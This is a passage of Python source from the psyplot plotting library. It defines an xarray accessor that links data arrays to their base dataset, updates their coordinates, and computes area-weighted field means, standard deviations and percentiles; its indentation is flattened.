"""Return a :class:`InteractiveList` that contains this object"""
raise NotImplementedError('Not implemented for the %s class' % (
self.__class__.__name__, ))
@xr.register_dataarray_accessor('psy')
class InteractiveArray(InteractiveBase):
"""Interactive psyplot accessor for the data array
This class keeps a reference to the base :class:`xarray.Dataset` from
which the :class:`xarray.DataArray` originates and enables switching
between the coordinates in the array. Furthermore it has a
:attr:`plotter` attribute to
enable interactive plotting via an :class:`psyplot.plotter.Plotter`
instance."""
@property
def base(self):
"""Base dataset this instance gets its data from"""
if self._base is None:
if 'variable' in self.arr.dims:
def to_dataset(i):
ret = self.isel(variable=i).to_dataset(
name=self.arr.coords['variable'].values[i])
try:
return ret.drop_vars('variable')
except ValueError: # 'variable' Variable not defined
pass
return ret
ds = to_dataset(0)
if len(self.arr.coords['variable']) > 1:
for i in range(1, len(self.arr.coords['variable'])):
ds.update(ds.merge(to_dataset(i)))
self._base = ds
else:
self._base = self.arr.to_dataset(
name=self.arr.name or self.arr_name)
self.onbasechange.emit()
return self._base
@base.setter
def base(self, value):
self._base = value
self.onbasechange.emit()
@property
def decoder(self):
"""The decoder of this array"""
try:
return self._decoder
except AttributeError:
self._decoder = CFDecoder.get_decoder(self.base, self.arr)
return self._decoder
@decoder.setter
def decoder(self, value):
self._decoder = value
@property
def idims(self):
"""Coordinates in the :attr:`base` dataset as int or slice
This attribute holds a mapping from the coordinate names of this
array to an integer, slice or an array of integer that represent the
coordinates in the :attr:`base` dataset"""
if self._idims is None:
self._idims = self.decoder.get_idims(self.arr)
return self._idims
@idims.setter
def idims(self, value):
self._idims = value
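# Sketch: for an array that was extracted via ``ds.t2m.isel(time=2)``, the
# :attr:`idims` mapping would look roughly like
# ``{'time': 2, 'lat': slice(None), 'lon': slice(None)}`` (hypothetical
# dimension names), which plugged into ``ds.isel(**idims)`` recovers the
# array from the base dataset.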
@property
@docstrings
def _njobs(self):
"""%(InteractiveBase._njobs)s"""
ret = super(self.__class__, self)._njobs or [0]
ret[0] += 1
return ret
logger = InteractiveBase.logger
_idims = None
_base = None
# -------------- SIGNALS --------------------------------------------------
#: :class:`Signal` to be emitted when the base of the object changes
onbasechange = Signal('_onbasechange')
_onbasechange = None
@docstrings.dedent
def __init__(self, xarray_obj, *args, **kwargs):
"""
The ``*args`` and ``**kwargs`` are essentially the same as for the
:class:`xarray.DataArray` class; additional ``**kwargs`` are
described below.
Other Parameters
----------------
base: xarray.Dataset
Default: None. Dataset that serves as the origin of the data
contained in this DataArray instance. This will be used if you want
to update the coordinates via the :meth:`update` method. If None,
this instance will serve as a base as soon as it is needed.
decoder: psyplot.CFDecoder
The decoder that decodes the `base` dataset and is used to get
bounds. If not given, a new :class:`CFDecoder` is created
idims: dict
Default: None. Dictionary with integer values and/or slices for the
dimensions of the `base` dataset. If not given, they are determined
automatically
%(InteractiveBase.parameters)s
"""
self.arr = xarray_obj
super(InteractiveArray, self).__init__(*args, **kwargs)
self._registered_updates = {}
self._new_dims = {}
self.method = None
def init_accessor(self, base=None, idims=None, decoder=None,
*args, **kwargs):
"""
Initialize the accessor instance
This method initializes the accessor
Parameters
----------
base: xr.Dataset
The base dataset for the data
idims: dict
A mapping from dimension name to indices. If not provided, it is
calculated when the :attr:`idims` attribute is accessed
decoder: CFDecoder
The decoder of this object
%(InteractiveBase.parameters)s
"""
if base is not None:
self.base = base
self.idims = idims
if decoder is not None:
self.decoder = decoder
super(InteractiveArray, self).__init__(*args, **kwargs)
@property
def iter_base_variables(self):
"""An iterator over the base variables in the :attr:`base` dataset"""
if VARIABLELABEL in self.arr.coords:
return (self._get_base_var(name) for name in safe_list(
self.arr.coords[VARIABLELABEL].values.tolist()))
name = self.arr.name
if name is None:
return iter([self.arr._variable])
return iter([self.base.variables[name]])
def _get_base_var(self, name):
try:
return self.base.variables[name]
except KeyError:
return self.arr.sel(**{VARIABLELABEL: name}).rename(name)
@property
def base_variables(self):
"""A mapping from the variable name to the variablein the :attr:`base`
dataset."""
if VARIABLELABEL in self.arr.coords:
return OrderedDict([
(name, self._get_base_var(name)) for name in safe_list(
self.arr.coords[VARIABLELABEL].values.tolist())])
name = self.arr.name
if name is None:
return {name: self.arr._variable}
else:
return {self.arr.name: self.base.variables[self.arr.name]}
docstrings.keep_params('setup_coords.parameters', 'dims')
@docstrings.get_sections(base='InteractiveArray._register_update')
@docstrings.dedent
def _register_update(self, method='isel', replot=False, dims={}, fmt={},
force=False, todefault=False):
"""
Register new dimensions and formatoptions for updating
Parameters
----------
method: {'isel', None, 'nearest', ...}
Selection method of the xarray.Dataset to be used for setting the
variables from the information in `dims`.
If `method` is 'isel', the :meth:`xarray.Dataset.isel` method is
used. Otherwise it sets the `method` parameter for the
:meth:`xarray.Dataset.sel` method.
%(setup_coords.parameters.dims)s
%(InteractiveBase._register_update.parameters)s
See Also
--------
start_update"""
if self._new_dims and self.method != method:
raise ValueError(
"New dimensions were already specified for with the %s method!"
" I can not choose a new method %s" % (self.method, method))
else:
self.method = method
if 'name' in dims:
self._new_dims['name'] = dims.pop('name')
if 'name' in self._new_dims:
name = self._new_dims['name']
if not isstring(name):
name = name[0] # concatenated array
arr = self.base[name]
else:
arr = next(six.itervalues(self.base_variables))
self._new_dims.update(self.decoder.correct_dims(arr, dims))
InteractiveBase._register_update(
self, fmt=fmt, replot=replot or bool(self._new_dims), force=force,
todefault=todefault)
def _update_concatenated(self, dims, method):
"""Updates a concatenated array to new dimensions"""
def is_unequal(v1, v2):
try:
return bool(v1 != v2)
except ValueError: # arrays
try:
# reduce the element-wise comparison to a single boolean
return not (v1 == v2).all()
except AttributeError:
return False
def filter_attrs(item):
"""Checks whether the attribute is from the base variable"""
return (item[0] not in self.base.attrs or
is_unequal(item[1], self.base.attrs[item[0]]))
saved_attrs = list(filter(filter_attrs, six.iteritems(self.arr.attrs)))
saved_name = self.arr.name
self.arr.name = 'None'
if 'name' in dims:
name = dims.pop('name')
else:
name = list(self.arr.coords['variable'].values)
if method == 'isel':
self.idims.update(dims)
dims = self.idims
for dim in set(self.base[name].dims) - set(dims):
dims[dim] = slice(None)
for dim in set(dims) - set(self.base[name].dims):
del dims[dim]
res = self.base[name].isel(**dims).to_array()
else:
self._idims = None
for key, val in six.iteritems(self.arr.coords):
if key != 'variable':
dims.setdefault(key, val)
kws = dims.copy()
# the sel method does not work with slice objects
if not any(isinstance(idx, slice) for idx in dims.values()):
kws['method'] = method
try:
res = self.base[name].sel(**kws)
except KeyError:
_fix_times(kws)
res = self.base[name].sel(**kws)
res = res.to_array()
if 'coordinates' in self.base[name[0]].encoding:
res.encoding['coordinates'] = self.base[name[0]].encoding[
'coordinates']
self.arr._variable = res._variable
self.arr._coords = res._coords
try:
self.arr._indexes = (
res._indexes.copy() if res._indexes is not None else None)
except AttributeError: # res.indexes not existent for xr<0.12
pass
self.arr.name = saved_name
for key, val in saved_attrs:
self.arr.attrs[key] = val
def _update_array(self, dims, method):
"""Updates the array to the new dims from then :attr:`base` dataset"""
def is_unequal(v1, v2):
try:
return bool(v1 != v2)
except ValueError: # arrays
try:
# reduce the element-wise comparison to a single boolean
return not (v1 == v2).all()
except AttributeError:
return False
def filter_attrs(item):
"""Checks whether the attribute is from the base variable"""
return (item[0] not in base_var.attrs or
is_unequal(item[1], base_var.attrs[item[0]]))
base_var = self.base.variables[self.arr.name]
if 'name' in dims:
name = dims.pop('name')
self.arr.name = name
else:
name = self.arr.name
# save attributes that have been changed by the user
saved_attrs = list(filter(filter_attrs, six.iteritems(self.arr.attrs)))
if method == 'isel':
self.idims.update(dims)
dims = self.idims
for dim in set(self.base[name].dims) - set(dims):
dims[dim] = slice(None)
for dim in set(dims) - set(self.base[name].dims):
del dims[dim]
res = self.base[name].isel(**dims)
else:
self._idims = None
old_dims = self.arr.dims[:]
for key, val in six.iteritems(self.arr.coords):
dims.setdefault(key, val)
kws = dims.copy()
# the sel method does not work with slice objects
if not any(isinstance(idx, slice) for idx in dims.values()):
kws['method'] = method
try:
res = self.base[name].sel(**kws)
except KeyError:
_fix_times(kws)
res = self.base[name].sel(**kws)
# squeeze the 0-dimensional dimensions
res = res.isel(**{
dim: 0 for i, dim in enumerate(res.dims) if (
res.shape[i] == 1 and dim not in old_dims)})
self.arr._variable = res._variable
self.arr._coords = res._coords
try:
self.arr._indexes = (
res._indexes.copy() if res._indexes is not None else None)
except AttributeError: # res.indexes not existent for xr<0.12
pass
# update to old attributes
for key, val in saved_attrs:
self.arr.attrs[key] = val
def shiftlon(self, central_longitude):
"""
Shift longitudes and the data so that they match the map projection
region.
Only valid for cylindrical/pseudo-cylindrical global projections and
data on regular lat/lon grids. Longitudes need to be 1D.
Parameters
----------
central_longitude
The center of the map projection region
References
----------
This function is copied and taken from the
:class:`mpl_toolkits.basemap.Basemap` class. The only difference is
that we do not mask values outside the map projection region
"""
if xr_version < (0, 10):
raise NotImplementedError(
"xarray>=0.10 is required for the shiftlon method!")
arr = self.arr
ret = arr.copy(True, arr.values.copy())
if arr.ndim > 2:
xname = self.get_dim('x')
yname = self.get_dim('y')
shapes = OrderedDict(
[(dim, range(i)) for dim, i in zip(arr.dims, arr.shape)
if dim not in [xname, yname]])
dims = list(shapes)
for indexes in product(*shapes.values()):
d = dict(zip(dims, indexes))
shifted = ret[d].psy.shiftlon(central_longitude)
ret[d] = shifted.values
x = shifted.psy.get_coord('x')
ret[x.name] = shifted[x.name].variable
return ret
lon = self.get_coord('x').variable
xname = self.get_dim('x')
ix = arr.dims.index(xname)
lon = lon.copy(True, lon.values.copy())
lonsin = lon.values
datain = arr.values.copy()
clon = np.asarray(central_longitude)
if lonsin.ndim != 1:
raise ValueError('1D longitudes required')
elif clon.ndim:
raise ValueError("Central longitude must be a scalar, not "
"%i-dimensional!" % clon.ndim)
lonsin = np.where(lonsin > clon+180, lonsin-360, lonsin)
lonsin = np.where(lonsin < clon-180, lonsin+360, lonsin)
londiff = np.abs(lonsin[0:-1]-lonsin[1:])
londiff_sort = np.sort(londiff)
thresh = 360.-londiff_sort[-2]
itemindex = len(lonsin) - np.where(londiff >= thresh)[0]
if itemindex.size:
# check to see if cyclic (wraparound) point included
# if so, remove it.
if np.abs(lonsin[0]-lonsin[-1]) < 1.e-4:
hascyclic = True
lonsin_save = lonsin.copy()
lonsin = lonsin[1:]
if datain is not None:
datain_save = datain.copy()
datain = datain[1:]
else:
hascyclic = False
lonsin = np.roll(lonsin, itemindex-1)
if datain is not None:
datain = np.roll(datain, itemindex-1, [ix])
# add cyclic point back at beginning.
if hascyclic:
lonsin_save[1:] = lonsin
lonsin_save[0] = lonsin[-1]-360.
lonsin = lonsin_save
if datain is not None:
datain_save[1:] = datain
datain_save[0] = datain[-1]
datain = datain_save
ret = ret.copy(True, datain)
lon.values[:] = lonsin
ret[lon.name] = lon
return ret
@docstrings.dedent
def start_update(self, draw=None, queues=None):
"""
Conduct the formerly registered updates
This method conducts the updates that have been registered via the
:meth:`update` method. You can call this method if the
:attr:`no_auto_update` attribute of this instance is True and the
`auto_update` parameter in the :meth:`update` method has been set to
        False.
Parameters
----------
%(InteractiveBase.start_update.parameters)s
Returns
-------
%(InteractiveBase.start_update.returns)s
See Also
--------
:attr:`no_auto_update`, update
"""
def filter_attrs(item):
return (item[0] not in self.base.attrs or
item[1] != self.base.attrs[item[0]])
if queues is not None:
            # make sure that no plot is updated while the data is gathered
queues[0].get()
try:
dims = self._new_dims
method = self.method
if dims:
if VARIABLELABEL in self.arr.coords:
self._update_concatenated(dims, method)
else:
self._update_array(dims, method)
if queues is not None:
queues[0].task_done()
self._new_dims = {}
self.onupdate.emit()
except Exception:
self._finish_all(queues)
raise
return InteractiveBase.start_update(self, draw=draw, queues=queues)
@docstrings.get_sections(base='InteractiveArray.update',
sections=['Parameters', 'Notes'])
@docstrings.dedent
def update(self, method='isel', dims={}, fmt={}, replot=False,
auto_update=False, draw=None, force=False, todefault=False,
**kwargs):
"""
Update the coordinates and the plot
This method updates all arrays in this list with the given coordinate
values and formatoptions.
Parameters
----------
%(InteractiveArray._register_update.parameters)s
        auto_update: bool
            Boolean determining whether or not the :meth:`start_update`
            method is called at the end.
%(InteractiveBase.start_update.parameters)s
``**kwargs``
Any other formatoption or dimension that shall be updated
(additionally to those in `fmt` and `dims`)
Notes
-----
When updating to a new array while trying to set the dimensions at the
same time, you have to specify the new dimensions via the `dims`
parameter, e.g.::
da.psy.update(name='new_name', dims={'new_dim': 3})
if ``'new_dim'`` is not yet a dimension of this array
%(InteractiveBase.update.notes)s"""
dims = dict(dims)
fmt = dict(fmt)
vars_and_coords = set(chain(
self.arr.dims, self.arr.coords, ['name', 'x', 'y', 'z', 't']))
furtherdims, furtherfmt = utils.sort_kwargs(kwargs, vars_and_coords)
dims.update(furtherdims)
fmt.update(furtherfmt)
self._register_update(method=method, replot=replot, dims=dims,
fmt=fmt, force=force, todefault=todefault)
if not self.no_auto_update or auto_update:
self.start_update(draw=draw)
def _short_info(self, intend=0, maybe=False):
str_intend = ' ' * intend
if 'variable' in self.arr.coords:
name = ', '.join(self.arr.coords['variable'].values)
else:
name = self.arr.name
if self.arr.ndim > 0:
dims = ', with (%s)=%s' % (', '.join(self.arr.dims),
self.arr.shape)
else:
dims = ''
return str_intend + "%s: %i-dim %s of %s%s, %s" % (
self.arr_name, self.arr.ndim, self.arr.__class__.__name__, name,
dims, ", ".join(
"%s=%s" % (coord, format_item(val.values))
for coord, val in six.iteritems(self.arr.coords)
if val.ndim == 0))
def __getitem__(self, key):
ret = self.arr.__getitem__(key)
ret.psy._base = self.base
return ret
def isel(self, *args, **kwargs):
# reimplemented to keep the base. The doc is set below
ret = self.arr.isel(*args, **kwargs)
ret.psy._base = self._base
return ret
def sel(self, *args, **kwargs):
# reimplemented to keep the base. The doc is set below
ret = self.arr.sel(*args, **kwargs)
ret.psy._base = self._base
return ret
def copy(self, deep=False):
"""Copy the array
This method returns a copy of the underlying array in the :attr:`arr`
attribute. It is more stable because it creates a new `psy` accessor"""
arr = self.arr.copy(deep)
try:
arr.psy = InteractiveArray(arr)
except AttributeError: # attribute is read-only for xarray >=0.13
pass
return arr
def to_interactive_list(self):
return InteractiveList([self], arr_name=self.arr_name)
@docstrings.get_sections(base='InteractiveArray.get_coord')
@docstrings.dedent
def get_coord(self, what, base=False):
"""
        Get the t-, x-, y- or z-coordinate of this data array
Parameters
----------
what: {'t', 'x', 'y', 'z'}
The letter of the axis
base: bool
            If True, use the base variable in the :attr:`base` dataset.
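
        Examples
        --------
        A short sketch, assuming ``da`` follows the CF conventions::

            lon = da.psy.get_coord('x')  # the x-coordinate variable
        """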
what = what.lower()
return getattr(self.decoder, 'get_' + what)(
next(six.itervalues(self.base_variables)) if base else self.arr,
self.arr.coords)
@docstrings.dedent
def get_dim(self, what, base=False):
"""
        Get the name of the t-, x-, y- or z-dimension of this data array
Parameters
----------
%(InteractiveArray.get_coord.parameters)s"""
what = what.lower()
return getattr(self.decoder, 'get_%sname' % what)(
next(six.itervalues(self.base_variables)) if base else self.arr)
# ------------------ Calculations -----------------------------------------
def _gridweights(self):
"""Calculate the gridweights with a simple rectangular approximation"""
arr = self.arr
xcoord = self.get_coord('x')
ycoord = self.get_coord('y')
# convert the units
xcoord_orig = xcoord
ycoord_orig = ycoord
units = xcoord.attrs.get('units', '')
in_metres = False
in_degree = False
if 'deg' in units or (
'rad' not in units and 'lon' in xcoord.name and
'lat' in ycoord.name):
xcoord = xcoord * np.pi / 180
ycoord = ycoord * np.pi / 180
in_degree = True
elif 'rad' in units:
pass
else:
in_metres = True
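        # For geographic coordinates, the area of a grid cell on the unit
        # sphere is approximated below as
        #     A = (lon_1 - lon_0) * (sin(lat_1) - sin(lat_0))
        # with the cell bounds in radians; for metric coordinates, the plain
        # rectangle area is used instead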
# calculate the gridcell boundaries
xbounds = self.decoder.get_plotbounds(xcoord, arr.coords)
ybounds = self.decoder.get_plotbounds(ycoord, arr.coords)
if xbounds.ndim == 1:
xbounds, ybounds = np.meshgrid(xbounds, ybounds)
# calculate the weights based on the units
if xcoord.ndim == 2 or self.decoder.is_unstructured(self.arr):
warn("[%s] - Curvilinear grids are not supported! "
"Using constant grid cell area weights!" % self.logger.name,
PsyPlotRuntimeWarning)
weights = np.ones_like(xcoord.values)
elif in_metres:
weights = np.abs(xbounds[:-1, :-1] - xbounds[1:, 1:]) * (
np.abs(ybounds[:-1, :-1] - ybounds[1:, 1:]))
else:
weights = np.abs(xbounds[:-1, :-1] - xbounds[1:, 1:]) * (
np.sin(ybounds[:-1, :-1]) - np.sin(ybounds[1:, 1:]))
        # mask out-of-range coordinate values and normalize the weights by
        # their sum
if in_degree:
xmask = (xcoord_orig.values < -400) | (xcoord_orig.values > 400)
ymask = (ycoord_orig.values < -200) | (ycoord_orig.values > 200)
if xmask.any() or ymask.any():
if xmask.ndim == 1 and weights.ndim != 1:
xmask, ymask = np.meshgrid(xmask, ymask)
weights[xmask | ymask] = np.nan
if np.any(~np.isnan(weights)):
weights /= np.nansum(weights)
return weights
def _gridweights_cdo(self):
"""Estimate the gridweights using CDOs"""
from cdo import Cdo
from tempfile import NamedTemporaryFile
sdims = {self.get_dim('y'), self.get_dim('x')}
cdo = Cdo()
fname = NamedTemporaryFile(prefix='psy', suffix='.nc').name
arr = self.arr
base = arr.psy.base
dims = arr.dims
ds = arr.isel(**{d: 0 for d in set(dims) - sdims}).to_dataset()
for coord in six.itervalues(ds.coords):
bounds = coord.attrs.get('bounds', coord.encoding.get('bounds'))
if (bounds and bounds in set(base.coords) - set(ds.coords) and
sdims.intersection(base.coords[bounds].dims)):
ds[bounds] = base.sel(
**{d: arr.coords[d].values for d in sdims}
).coords[bounds]
ds = ds.drop_vars([c.name for c in six.itervalues(ds.coords)
if not c.ndim])
to_netcdf(ds, fname)
ret = cdo.gridweights(input=fname, returnArray='cell_weights')
try:
os.remove(fname)
except Exception:
pass
return ret
def _weights_to_da(self, weights, keepdims=False, keepshape=False):
"""Convert the 2D weights into a DataArray and potentially enlarge it
"""
arr = self.arr
xcoord = self.get_coord('x')
ycoord = self.get_coord('y')
sdims = (self.get_dim('y'), self.get_dim('x'))
if sdims[0] == sdims[1]: # unstructured grids
sdims = sdims[:1]
if (ycoord.name, xcoord.name) != sdims:
attrs = dict(coordinates=ycoord.name + ' ' + xcoord.name)
else:
attrs = {}
# reshape and expand if necessary
if not keepdims and not keepshape:
coords = {ycoord.name: ycoord, xcoord.name: xcoord}
dims = sdims
elif keepshape:
if with_dask:
from dask.array import broadcast_to, notnull
else:
from numpy import broadcast_to, isnan
def notnull(a):
return ~isnan(a)
dims = arr.dims
coords = arr.coords
weights = broadcast_to(weights / weights.sum(), arr.shape)
            # set NaNs to zero weights. This step takes quite a lot of time
            # for large arrays since it involves a copy of the entire `arr`
weights *= notnull(arr)
# normalize the weights
weights /= weights.sum(axis=tuple(map(dims.index, sdims)),
keepdims=True)
else:
dims = arr.dims
coords = arr.isel(
**{d: 0 if d not in sdims else slice(None)
for d in dims}).coords
weights = weights.reshape(
tuple(1 if dim not in sdims else s
for s, dim in zip(arr.shape, arr.dims)))
return xr.DataArray(weights, dims=dims, coords=coords,
name='cell_weights', attrs=attrs)
def gridweights(self, keepdims=False, keepshape=False, use_cdo=None):
"""Calculate the cell weights for each grid cell
Parameters
----------
keepdims: bool
If True, keep the number of dimensions
keepshape: bool
            If True, keep the exact shape of the source array and mask the
            missing values in the array
use_cdo: bool or None
If True, use Climate Data Operators (CDOs) to calculate the
weights. Note that this is used automatically for unstructured
grids. If None, it depends on the ``'gridweights.use_cdo'``
item in the :attr:`psyplot.rcParams`.
Returns
-------
xarray.DataArray
            The 2D-DataArray with the grid weights
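
        Examples
        --------
        A minimal sketch, assuming ``da`` holds a 2D variable on a regular
        lat/lon grid (the array is hypothetical)::

            weights = da.psy.gridweights()  # 2D weights that sum up to 1
            weighted_mean = (da * weights).sum()
        """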
if use_cdo is None:
use_cdo = rcParams['gridweights.use_cdo']
if not use_cdo and self.decoder.is_unstructured(self.arr):
use_cdo = True
if use_cdo is None or use_cdo:
try:
weights = self._gridweights_cdo()
except Exception:
if use_cdo:
raise
else:
weights = self._gridweights()
else:
weights = self._gridweights()
return self._weights_to_da(weights, keepdims=keepdims,
keepshape=keepshape)
def _fldaverage_args(self):
"""Masked array, xname, yname and axis for calculating the average"""
arr = self.arr
sdims = (self.get_dim('y'), self.get_dim('x'))
if sdims[0] == sdims[1]:
sdims = sdims[:1]
axis = tuple(map(arr.dims.index, sdims))
return arr, sdims, axis
def _insert_fldmean_bounds(self, da, keepdims=False):
xcoord = self.get_coord('x')
ycoord = self.get_coord('y')
sdims = (self.get_dim('y'), self.get_dim('x'))
xbounds = np.array([[xcoord.min(), xcoord.max()]])
ybounds = np.array([[ycoord.min(), ycoord.max()]])
xdims = (sdims[-1], 'bnds') if keepdims else ('bnds', )
ydims = (sdims[0], 'bnds') if keepdims else ('bnds', )
xattrs = xcoord.attrs.copy()
xattrs.pop('bounds', None)
yattrs = ycoord.attrs.copy()
yattrs.pop('bounds', None)
da.psy.base.coords[xcoord.name + '_bnds'] = xr.Variable(
xdims, xbounds if keepdims else xbounds[0], attrs=xattrs)
da.psy.base.coords[ycoord.name + '_bnds'] = xr.Variable(
ydims, ybounds if keepdims else ybounds[0], attrs=yattrs)
def fldmean(self, keepdims=False):
"""Calculate the weighted mean over the x- and y-dimension
This method calculates the weighted mean of the spatial dimensions.
Weights are calculated using the :meth:`gridweights` method, missing
values are ignored. x- and y-dimensions are identified using the
        :attr:`decoder`'s :meth:`~CFDecoder.get_xname` and
:meth:`~CFDecoder.get_yname` methods.
Parameters
----------
keepdims: bool
If True, the dimensionality of this array is maintained
Returns
-------
xr.DataArray
The computed fldmeans. The dimensions are the same as in this
array, only the spatial dimensions are omitted if `keepdims` is
False.
See Also
--------
fldstd: For calculating the weighted standard deviation
fldpctl: For calculating weighted percentiles
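
        Examples
        --------
        A minimal sketch, assuming ``da`` has the dimensions
        ``('time', 'lat', 'lon')`` (names are hypothetical)::

            ts = da.psy.fldmean()  # time series of weighted spatial means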
"""
gridweights = self.gridweights()
arr, sdims, axis = self._fldaverage_args()
xcoord = self.decoder.get_x(next(six.itervalues(self.base_variables)),
arr.coords)
ycoord = self.decoder.get_y(next(six.itervalues(self.base_variables)),
arr.coords)
        means = (arr * gridweights).sum(axis=axis) * (
gridweights.size / arr.notnull().sum(axis=axis))
        if keepdims:
            means = means.expand_dims(sdims, axis=axis)
means[xcoord.name] = xcoord.mean().expand_dims(xcoord.dims[0])
means[ycoord.name] = ycoord.mean().expand_dims(ycoord.dims[0])
else:
means[xcoord.name] = xcoord.mean()
means[ycoord.name] = ycoord.mean()
means.coords[xcoord.name].attrs['bounds'] = xcoord.name + '_bnds'
means.coords[ycoord.name].attrs['bounds'] = ycoord.name + '_bnds'
self._insert_fldmean_bounds(means, keepdims)
means.name = arr.name
return means
def fldstd(self, keepdims=False):
"""Calculate the weighted standard deviation over x- and y-dimension
This method calculates the weighted standard deviation of the spatial
dimensions. Weights are calculated using the :meth:`gridweights`
method, missing values are ignored. x- and y-dimensions are identified
        using the :attr:`decoder`'s :meth:`~CFDecoder.get_xname` and
:meth:`~CFDecoder.get_yname` methods.
Parameters
----------
keepdims: bool
If True, the dimensionality of this array is maintained
Returns
-------
xr.DataArray
The computed standard deviations. The dimensions are the same as
in this array, only the spatial dimensions are omitted if
`keepdims` is False.
See Also
--------
fldmean: For calculating the weighted mean
fldpctl: For calculating weighted percentiles
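
        Examples
        --------
        Analogous to :meth:`fldmean`, a hedged sketch::

            ts_std = da.psy.fldstd()  # weighted spatial standard deviation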
"""
arr, sdims, axis = self._fldaverage_args()
means = self.fldmean(keepdims=True)
weights = self.gridweights(keepshape=True)
variance = ((arr - means.values)**2 * weights).sum(axis=axis)
if keepdims:
variance = variance.expand_dims(sdims, axis=axis)
for key, coord in six.iteritems(means.coords):
if key not in variance.coords:
dims = set(sdims).intersection(coord.dims)
variance[key] = coord if keepdims else coord.isel(
**dict(zip(dims, repeat(0))))
for key, coord in six.iteritems(means.psy.base.coords):
if key not in variance.psy.base.coords:
dims = set(sdims).intersection(coord.dims)
variance.psy.base[key] = coord if keepdims else coord.isel(
**dict(zip(dims, repeat(0))))
std = variance**0.5
std.name = arr.name
return std
def fldpctl(self, q, keepdims=False):
"""Calculate the percentiles along the x- and y-dimensions
        This method calculates the specified percentiles over the spatial
        dimensions. Percentiles are weighted by the :meth:`gridweights`
        method and missing values are ignored. x- and y-dimensions are
        identified through the :attr:`decoder`'s
        :meth:`~CFDecoder.get_xname` and :meth:`~CFDecoder.get_yname`
        methods.
Parameters
----------
q: float or list of floats between 0 and 100
            The percentiles to estimate
keepdims: bool
If True, the number of dimensions of the array are maintained
Returns
-------
xr.DataArray
The data array with the dimensions. If `q` is a list or `keepdims`
is True, the first dimension will be the percentile ``'pctl'``.
The other dimensions are the same as in this array, only the
spatial dimensions are omitted if `keepdims` is False.
See Also
--------
fldstd: For calculating the weighted standard deviation
fldmean: For calculating the weighted mean
        Warnings
        --------
        This method loads the entire array into memory, so take care when
        handling big data.
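
        Examples
        --------
        A minimal sketch (the array is hypothetical)::

            median = da.psy.fldpctl(50)         # weighted spatial median
            p10_p90 = da.psy.fldpctl([10, 90])  # 'pctl' is the 1st dimension
        """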
gridweights = self.gridweights(keepshape=True)
arr = self.arr
        q = np.asarray(q, dtype=float)
        if not (np.all(q >= 0) and np.all(q <= 100)):
            raise ValueError('q should be in [0, 100]')
        q = q / 100.
reduce_shape = False if keepdims else (not bool(q.ndim))
if not q.ndim:
q = q[np.newaxis]
data = arr.values.copy()
sdims, axis = self._fldaverage_args()[1:]
weights = gridweights.values
# flatten along the spatial axis
for ax in axis:
data = np.rollaxis(data, ax, 0)
weights = np.rollaxis(weights, ax, 0)
        data = data.reshape(
            (np.prod(data.shape[:len(axis)]), ) + data.shape[len(axis):])
        weights = weights.reshape(
            (np.prod(weights.shape[:len(axis)]), ) +
            weights.shape[len(axis):])
# sort the data
sorter = np.argsort(data, axis=0)
all_indices = map(tuple, product(*map(range, data.shape[1:])))
for indices in all_indices:
indices = (slice(None), ) + indices
data.__setitem__(
indices, data.__getitem__(indices)[
sorter.__getitem__(indices)])
weights.__setitem__(
indices, weights.__getitem__(indices)[
sorter.__getitem__(indices)])
# compute the percentiles
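        # With normalized weights w_i sorted along with the data, the
        # cumulative midpoints c_i = w_1 + ... + w_i - w_i / 2 serve as
        # plotting positions; the requested quantiles are then obtained by
        # linearly interpolating the sorted data at these positions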
try:
weights = np.nancumsum(weights, axis=0) - 0.5 * weights
except AttributeError:
notnull = ~np.isnan(weights)
weights[notnull] = np.cumsum(weights[notnull])
all_indices = map(tuple, product(*map(range, data.shape[1:])))
pctl = np.zeros((len(q), ) + data.shape[1:])
for indices in all_indices:
indices = (slice(None), ) + indices
mask = ~np.isnan(data.__getitem__(indices))
pctl.__setitem__(indices, np.interp(
q, weights.__getitem__(indices)[mask],
data.__getitem__(indices)[mask]))
        # set up the data array and its coordinates
xcoord = self.decoder.get_x(next(six.itervalues(self.base_variables)),
arr.coords)
ycoord = self.decoder.get_y(next(six.itervalues(self.base_variables)),
arr.coords)
coords = dict(arr.coords)
if keepdims:
pctl = pctl.reshape(
(len(q), ) +
tuple(1 if i in axis else s for i, s in enumerate(arr.shape)))
coords[xcoord.name] = xcoord.mean().expand_dims(xcoord.dims[0])
coords[ycoord.name] = ycoord.mean().expand_dims(ycoord.dims[0])
dims = arr.dims
else:
coords[xcoord.name] = xcoord.mean()
coords[ycoord.name] = ycoord.mean()
dims = tuple(d for d in arr.dims if d not in sdims)
if reduce_shape:
pctl = pctl[0]
coords['pctl'] = xr.Variable((), q[0] * 100.,
attrs={'long_name': 'Percentile'})
else:
coords['pctl'] = xr.Variable(('pctl', ), q * 100.,
attrs={'long_name': 'Percentile'})
dims = ('pctl', ) + dims
coords[xcoord.name].attrs['bounds'] = xcoord.name + '_bnds'
coords[ycoord.name].attrs['bounds'] = ycoord.name + '_bnds'
coords = {name: c for name, c in coords.items()
if set(c.dims) <= set(dims)}
ret = xr.DataArray(pctl, name=arr.name, dims=dims, coords=coords,
attrs=arr.attrs.copy())
self._insert_fldmean_bounds(ret, keepdims)
return ret
isel.__doc__ = xr.DataArray.isel.__doc__
sel.__doc__ = xr.DataArray.sel.__doc__
class ArrayList(list):
"""Base class for creating a list of interactive arrays from a dataset
This list contains and manages :class:`InteractiveArray` instances"""
docstrings.keep_params('InteractiveBase.parameters', 'auto_update')
@property
def dims(self):
"""Dimensions of the arrays in this list"""
return set(chain(*(arr.dims for arr in self)))
@property
def dims_intersect(self):
"""Dimensions of the arrays in this list that are used in all arrays
"""
return set.intersection(*map(
set, (getattr(arr, 'dims_intersect', arr.dims) for arr in self)))
@property
def arr_names(self):
"""Names of the arrays (!not of the variables!) in this list
This attribute can be set with an iterable of unique names to change
the array names of the data objects in this list."""
return list(arr.psy.arr_name for arr in self)
@arr_names.setter
def arr_names(self, value):
value = list(islice(value, 0, len(self)))
if not len(set(value)) == len(self):
raise ValueError(
"Got %i unique array names for %i data objects!" % (
len(set(value)), len(self)))
for arr, n in zip(self, value):
arr.psy.arr_name = n
@property
def names(self):
"""Set of the variable in this list"""
ret = set()
for arr in self:
if isinstance(arr, InteractiveList):
ret.update(arr.names)
else:
ret.add(arr.name)
return ret
@property
def all_names(self):
"""The variable names for each of the arrays in this list"""
return [
_get_variable_names(arr) if not isinstance(arr, ArrayList) else
arr.all_names
for arr in self]
@property
def all_dims(self):
"""The dimensions for each of the arrays in this list"""
return [
_get_dims(arr) if not isinstance(arr, ArrayList) else
arr.all_dims
for arr in self]
@property
def is_unstructured(self):
"""A boolean for each array whether it is unstructured or not"""
return [
arr.psy.decoder.is_unstructured(arr)
if not isinstance(arr, ArrayList) else
